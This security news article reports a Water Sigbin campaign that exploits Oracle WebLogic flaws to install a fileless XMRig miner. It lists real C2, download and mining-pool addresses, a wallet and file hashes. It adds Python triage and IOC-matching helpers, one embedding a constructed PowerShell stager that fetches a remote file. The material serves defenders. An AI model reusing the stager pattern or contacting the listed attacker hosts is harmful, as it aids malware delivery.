Water Sigbin Hackers Exploit Oracle WebLogic Vulnerabilities
Cybersecurity researchers uncovered an advanced attack campaign by the Water Sigbin (aka 8220 Gang) threat actor that exploited vulnerabilities in Oracle WebLogic Server, notably CVE-2017-3506 and CVE-2023-21839, to deploy the XMRig cryptocurrency miner on compromised systems.
The attack begins with the threat actor exploiting the WebLogic vulnerabilities to execute a malicious PowerShell script on the victim machine.
This script decodes a Base64-encoded payload, which initiates a multi-stage loading process that delivers the PureCrypter loader and the XMRig miner.
Water Sigbin employs several advanced techniques to evade detection:
- All payloads are protected with .NET Reactor, a code protection tool that obfuscates the code and includes anti-debugging measures
- The malware uses fileless execution techniques, such as reflective DLL injection and process hollowing, to run the malicious code entirely in memory
- The XMRig miner masquerades as legitimate processes such as cvtres.exe and AddinProcess.exe to avoid suspicion
Technical Analysis:
The attack involves several stages of payload decryption, decompression, and loading:
- The initial PowerShell script decodes the Base64 payload
- The decoded payload (wireguard2-3.exe) decrypts and loads the second-stage DLL (Zxpus.dll) via reflective injection
- Zxpus.dll retrieves an encrypted binary, decrypts it with AES, decompresses it with GZip, and deserializes it to obtain the next loader's configuration
- The loader creates a cvtres.exe process and injects the next-stage payload into it
- cvtres.exe loads the PureCrypter loader DLL (Tixrgtluffu.dll)
- PureCrypter registers with the C2 server and downloads the final XMRig miner payload
The malware collects system information such as the processor ID, disk drive details, and installed AV software using WMI queries. This information is encrypted and sent to the C2 server at 89.185.85[.]102:9091 for victim identification.
The malware employs fileless execution techniques, using reflective DLL loading and process injection. This allows the malicious code to run entirely in memory and evade disk-based detection mechanisms.
The payloads used throughout this campaign are protected with .NET Reactor, a .NET code protection tool, to hinder reverse engineering. The protection obfuscates the code, making it difficult for defenders to understand and replicate, and it also includes anti-debugging techniques.
The attack begins with the exploitation of CVE-2017-3506, which deploys a PowerShell script on the compromised machine.
This script decodes the first-stage Base64-encoded payload and stores the decrypted response in a registry key under the subkey path HKEY_CURRENT_USER\SOFTWARE.
Per Trend Micro's report, the malware then downloads an encrypted file named plugin3.dll, decrypts it with the TripleDES algorithm, and decompresses it with Gzip. The loader creates a new process named AddinProcess.exe to impersonate a legitimate process, uses process injection to load the XMRig payload into memory, and starts the new process.
The final payload is XMRig, a popular open-source mining tool that supports multiple operating systems. It sends a mining login request to the mining pool URL "217.182.205[.]238:8080" with the wallet address "ZEPHYR2xf9vMHptpxP6VY4hHwTe94b2L5SGyp9Czg57U8DwRT3RQvDd37eyKxoFJUYJvP5ivBbiFCAMyaKWUe9aPZzuNoDXYTtj2Z.c4k".
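The first thing a responder does with a stager of the kind described above is unwrap it to see what the next stage references. The Python helper below is an added example, not code from the report or from the actor's tooling: it pulls the largest Base64 blob out of a PowerShell script, decodes it, peels off a gzip layer when the magic bytes are present (and a UTF-16LE layer for -EncodedCommand style blobs), and reports the URLs and registry paths the inner stage mentions. The sample stager, its URL and its registry key are constructed placeholders; only the decode chain (Base64, then decompression, then execution from memory) is taken from the article.

```python
"""Triage helper for Base64-wrapped PowerShell stagers (added example)."""
import base64
import gzip
import re

# Constructed sample, not the campaign's bin.ps1: the inner stage is gzip-
# compressed and Base64-encoded, then decoded and run in memory by the outer
# script. The registry path and the URL (an RFC 5737 address) are placeholders.
INNER_STAGE = (
    b"$r = Invoke-WebRequest 'http://198.51.100.10/next.bin';"
    b"Set-ItemProperty -Path 'HKCU:\\SOFTWARE\\ExampleVendor' -Name cfg -Value $r.Content"
)
SAMPLE_STAGER = (
    "$s='" + base64.b64encode(gzip.compress(INNER_STAGE)).decode() + "';"
    "$b=[System.Convert]::FromBase64String($s);"
    "$g=New-Object IO.Compression.GZipStream((New-Object IO.MemoryStream(,$b)),"
    "[IO.Compression.CompressionMode]::Decompress);"
    "IEX ((New-Object IO.StreamReader($g)).ReadToEnd())"
)

# A run of 40+ Base64 characters that is not part of a longer token.
B64_RE = re.compile(r"(?<![A-Za-z0-9+/])([A-Za-z0-9+/]{40,}={0,2})(?![A-Za-z0-9+/=])")
URL_RE = re.compile(r"https?://[^\s'\"()]+")
REG_RE = re.compile(r"HK(?:CU|LM|U|CR|EY_[A-Z_]+):?\\[^\s'\"]+")


def unwrap(raw: bytes) -> tuple[list[str], bytes]:
    """Peel gzip and UTF-16LE wrappers off a decoded blob, recording each layer."""
    layers = []
    if raw[:2] == b"\x1f\x8b":  # gzip magic bytes
        raw = gzip.decompress(raw)
        layers.append("gzip")
    # -EncodedCommand payloads are UTF-16LE: every odd byte of ASCII text is NUL.
    if len(raw) >= 2 and len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        raw = raw.decode("utf-16le", errors="replace").encode()
        layers.append("utf-16le")
    return layers, raw


def analyze(script: str) -> dict:
    """Find the largest Base64 blob, decode it, and pull out loader indicators."""
    blobs = B64_RE.findall(script)
    if not blobs:
        return {"layers": [], "text": "", "urls": [], "registry_paths": []}
    blob = max(blobs, key=len)
    padded = blob + "=" * (-len(blob) % 4)  # tolerate stripped padding
    inner_layers, data = unwrap(base64.b64decode(padded))
    text = data.decode("utf-8", errors="replace")
    return {
        "layers": ["base64"] + inner_layers,
        "text": text,
        "urls": URL_RE.findall(text),
        "registry_paths": REG_RE.findall(text),
    }


if __name__ == "__main__":
    report = analyze(SAMPLE_STAGER)
    print("layers:", " -> ".join(report["layers"]))
    print("urls:", report["urls"])
    print("registry:", report["registry_paths"])
    print("stage:", report["text"])
```

The helper stops after one layer of compression and one of text encoding; a real sample in this campaign continues with AES or TripleDES decryption inside the next binary, which needs the key material recovered from that binary rather than a static decoder.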
Indicators of Compromise
SHA256 hashes (with Trend Micro detection names where given):
e6e69e85962a402a35cbc5b75571dab3739c0b2f3861ba5853dbd140bae4e4da
f4d11b36a844a68bf9718cf720984468583efa6664fc99966115a44b9a20aa33 - Ransom_Blocker.R002C0XFC24
0bf87b0e65713bf35c8cf54c9fa0015fa629624fd590cb4ba941cd7cdeda8050 - TROJ_FRS.VSNTFH24
b380b771c7f5c2c26750e281101873772e10c8c1a0d2a2ff0aff1912b569ab93 - TROJ_FRS.0NA104FH24
2e32c5cea00f8e4c808eae806b14585e8672385df7449d2f6575927537ce8884 - Trojan.MSIL.EXNET.VSNW11F24
URLs/IP addresses:
89[.]169[.]52[.]37
http://87[.]121[.]105[.]232/bin.ps1
http://79[.]110[.]49[.]232/plugin3.dll
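The indicators above are only useful once they are run over telemetry, and the masquerading described earlier gives a behavioural check that outlives the hashes and IPs. The Python script below is an added example, not from the report: the hashes, addresses, URLs, pool and wallet are the report's (refanged from the bracketed notation), while the pipe-delimited log format, the sample lines and the parent-process heuristic are constructed assumptions. The heuristic flags cvtres.exe or AddinProcess.exe being spawned by a WebLogic java.exe or a PowerShell host, which the .NET build and add-in tooling that normally starts those images would not do.

```python
"""Match the campaign's indicators and masquerade behaviour over log lines (added example)."""
import re

# Indicators from the report, refanged.
IOC_SHA256 = {
    "e6e69e85962a402a35cbc5b75571dab3739c0b2f3861ba5853dbd140bae4e4da",
    "f4d11b36a844a68bf9718cf720984468583efa6664fc99966115a44b9a20aa33",
    "0bf87b0e65713bf35c8cf54c9fa0015fa629624fd590cb4ba941cd7cdeda8050",
    "b380b771c7f5c2c26750e281101873772e10c8c1a0d2a2ff0aff1912b569ab93",
    "2e32c5cea00f8e4c808eae806b14585e8672385df7449d2f6575927537ce8884",
}
IOC_IPS = {"89.185.85.102", "217.182.205.238", "89.169.52.37",
           "87.121.105.232", "79.110.49.232"}
IOC_URLS = {"http://87.121.105.232/bin.ps1", "http://79.110.49.232/plugin3.dll"}
MINER_WALLET = ("ZEPHYR2xf9vMHptpxP6VY4hHwTe94b2L5SGyp9Czg57U8DwRT3RQvDd37eyKxoFJUYJvP5iv"
                "BbiFCAMyaKWUe9aPZzuNoDXYTtj2Z.c4k")
WALLET_PREFIX = MINER_WALLET.split(".")[0]  # drop the worker suffix

# Images the report says the miner impersonates, and parents that are an
# assumed red flag for them (a heuristic of this example, not from the report).
MASQUERADE_IMAGES = {"cvtres.exe", "addinprocess.exe"}
SUSPICIOUS_PARENTS = {"java.exe", "powershell.exe", "pwsh.exe"}

# Constructed log lines in a made-up format: kind|timestamp|host|fields...
#   process: image|parent|sha256    net: image|dst_ip|dst_port
#   proxy:   url                    cmdline: full command line
ZERO_HASH = "0" * 64  # placeholder hash for an unknown, benign binary
SAMPLE_LOGS = [
    "proxy|2024-06-10T08:01:02Z|wl-01|http://87.121.105.232/bin.ps1",
    "proxy|2024-06-10T08:01:05Z|wl-01|http://updates.example.org/patch.msi",
    f"process|2024-06-10T08:01:09Z|wl-01|cvtres.exe|java.exe|{ZERO_HASH}",
    f"process|2024-06-10T08:02:00Z|dev-07|cvtres.exe|msbuild.exe|{ZERO_HASH}",
    "process|2024-06-10T08:01:07Z|wl-01|installer.exe|powershell.exe|"
    "e6e69e85962a402a35cbc5b75571dab3739c0b2f3861ba5853dbd140bae4e4da",
    "net|2024-06-10T08:01:12Z|wl-01|AddinProcess.exe|217.182.205.238|8080",
    "net|2024-06-10T08:03:30Z|dev-07|chrome.exe|93.184.216.34|443",
    f"cmdline|2024-06-10T08:01:20Z|wl-01|cvtres.exe -o 217.182.205.238:8080 -u {MINER_WALLET}",
]


def match_line(line: str) -> list[str]:
    """Return the sorted list of reasons a log line is suspicious (empty if none)."""
    hits = []
    low = line.lower()
    for h in IOC_SHA256:
        if h in low:
            hits.append("hash:" + h[:12])
    for u in IOC_URLS:
        if u in line:
            hits.append("url:" + u)
    for ip in IOC_IPS:
        # Whole-address match so 89.185.85.102 does not fire on 189.185.85.1020.
        if re.search(r"(?<![\d.])" + re.escape(ip) + r"(?![\d.])", line):
            hits.append("ip:" + ip)
    if WALLET_PREFIX in line:
        hits.append("wallet")
    fields = line.split("|")
    if fields[0] == "process" and len(fields) >= 6:
        image, parent = fields[3].lower(), fields[4].lower()
        if image in MASQUERADE_IMAGES and parent in SUSPICIOUS_PARENTS:
            hits.append(f"masquerade:{image}<-{parent}")
    return sorted(hits)


def scan(lines: list[str]) -> list[tuple[str, list[str]]]:
    """Run match_line over every line and keep only the ones with findings."""
    alerts = []
    for line in lines:
        hits = match_line(line)
        if hits:
            alerts.append((line, hits))
    return alerts


if __name__ == "__main__":
    for line, hits in scan(SAMPLE_LOGS):
        print(", ".join(hits), "<=", line)
```

The dev-07 line with cvtres.exe under msbuild.exe is deliberately left unflagged: the point of the parent check is to separate the miner's impersonation from the legitimate .NET tool of the same name, which a bare image-name match cannot do.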
Mitigation:
Trend Micro advises organizations to implement security best practices such as regular patching, strong access controls, security assessments, and employee awareness training to protect against such threats. Specific recommendations include:
- Keep systems and software updated with the latest security patches
- Use strong authentication methods such as multi-factor authentication
- Regularly scan for vulnerabilities
- Educate employees on security best practices
- Use endpoint detection and response solutions to detect malicious activity
By exploiting WebLogic vulnerabilities, using advanced evasion techniques, and deploying XMRig miners, the Water Sigbin threat actor has once again demonstrated its technical sophistication.
Source credit : cybersecuritynews.com